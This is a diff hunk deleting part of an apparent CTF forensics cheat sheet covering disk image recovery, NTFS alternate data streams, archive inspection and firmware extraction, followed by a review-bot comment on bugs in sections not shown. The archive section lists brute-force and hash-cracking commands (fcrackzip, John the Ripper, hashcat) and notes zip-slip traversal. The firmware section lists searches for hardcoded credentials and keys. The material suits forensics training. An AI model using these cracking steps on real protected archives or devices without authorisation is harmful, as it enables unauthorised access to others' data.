- ├── mount -o loop,ro,offset=<N> disk.img /mnt → mount partition
244
- │ offset = start_sector × 512
245
- ├── autopsy → GUI forensic suite
246
- ├── Sleuthkit tools:
247
- │ ├── fls -r disk.img → list all files (including deleted!)
248
- │ ├── icat disk.img <inode> → extract file by inode
249
- │ ├── blkcat disk.img <block> → read specific block
250
- │ └── tsk_recover -e disk.img output/ → recover all files
251
- ├── photorec disk.img → recover deleted files (by file signature)
252
- ├── testdisk disk.img → partition recovery + file undelete
253
- └── Check slack space:
254
- blkstat disk.img <block> → check if block is allocated
255
-
256
- ═══════════════════════════════════════
257
- Specific filesystem features:
258
- ═══════════════════════════════════════
259
- ├── NTFS Alternate Data Streams:
260
- │ ├── dir /r → list ADS on Windows
261
- │ ├── getfattr -R -d /mnt/* → list ADS on mounted NTFS
262
- │ └── cat /mnt/file:hidden_stream → read ADS content
263
- ├── ext4 extended attributes:
264
- │ ├── getfattr -d <file> → list xattrs
265
- │ └── Journal: jls / jcat to read deleted journal entries
266
- ├── FAT filesystem:
267
- │ ├── No file permissions → everything is readable
268
- │ ├── Deleted files: filename starts with 0xE5
269
- │ └── Volume label may contain clues
270
- └── Filesystem timeline:
271
- fls -m "/" -r disk.img | mactime -b - > timeline.csv
272
- → chronological view of file access/modification/creation
273
- ```
274
-
275
- ## Archive Analysis
276
-
277
- ```
278
- Archive forensics:
279
- ├── ZIP:
280
- │ ├── unzip -l archive.zip → list contents without extracting
281
- │ ├── zipinfo archive.zip → detailed structure
282
- │ ├── Known-plaintext attack: pkcrack → crack if partial content known
283
- │ ├── fcrackzip -b -c 'aA1!' -l 1-8 archive.zip → brute force
284
- │ ├── john --format=zip hash.txt → John the Ripper (zip2john first)
285
- │ └── Zip slip: path traversal via ../../ in filenames
286
- ├── RAR:
287
- │ ├── rar2john archive.rar > hash.txt → extract hash
288
- │ └── hashcat -m 13000 hash.txt wordlist → crack
289
- ├── 7z:
290
- │ └── 7z l -slt archive.7z → detailed listing
291
- ├── tar/gz/bz2:
292
- │ ├── tar tf archive.tar → list contents
293
- │ └── Check timestamp/permissions for clues
294
- └── Nested archives:
295
- Multiple compression layers (zip inside gz inside tar)
296
- → automate: write script to recursively extract until flag found
297
- ```
298
-
299
- ## Firmware Analysis
300
-
301
- ```
302
- ├── binwalk -e firmware.bin → extract filesystem
303
- ├── firmware-mod-kit → unpack/repack firmware
304
- ├── Common filesystems: squashfs, jffs2, cramfs, yaffs2
305
- │ unsquashfs extracted/squashfs → mount squashfs
306
- ├── Look for:
307
- │ ├── /etc/shadow or /etc/passwd → hardcoded credentials
308
- │ ├── /etc/config/* → configuration files with secrets
309
- │ ├── *.key, *.pem → private keys
310
- │ ├── Web interface source code → vulnerabilities
311
- │ └── Compiled binaries → reverse engineer
312
- └── Emulation: qemu or firmadyne → run firmware for dynamic analysis
313
- ```
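Review bot: the zero-width-character detection one-liner in the "Text / Document Steganography" section, `cat -v <file> | grep -o '\xE2\x80[\x8B-\x8F]'`, cannot match: `cat -v` rewrites every byte above 0x7F as an `M-` escape before grep sees it, and GNU grep without `-P` does not interpret `\xE2` escapes, so the command is silently empty on files that do contain U+200B..U+200F; the listed U+FEFF is also encoded as `EF BB BF`, outside that byte range. A byte-level search (`grep -P` on the unmodified file under a C locale, or a Python scan over code points) is what the step intends. Smaller issues in the same hunk: the manual LSB snippet under "PNG / BMP" yields an empty string for RGB images because `getdata()` returns tuples there, which the trailing comment concedes but the code does not handle, and `linux.bash` is listed under "Profile detection" where it does not belong. The removal is consistent with the rest of this diff moving prompt content out of dist/, but these errors should be corrected wherever the forensics prompt now lives.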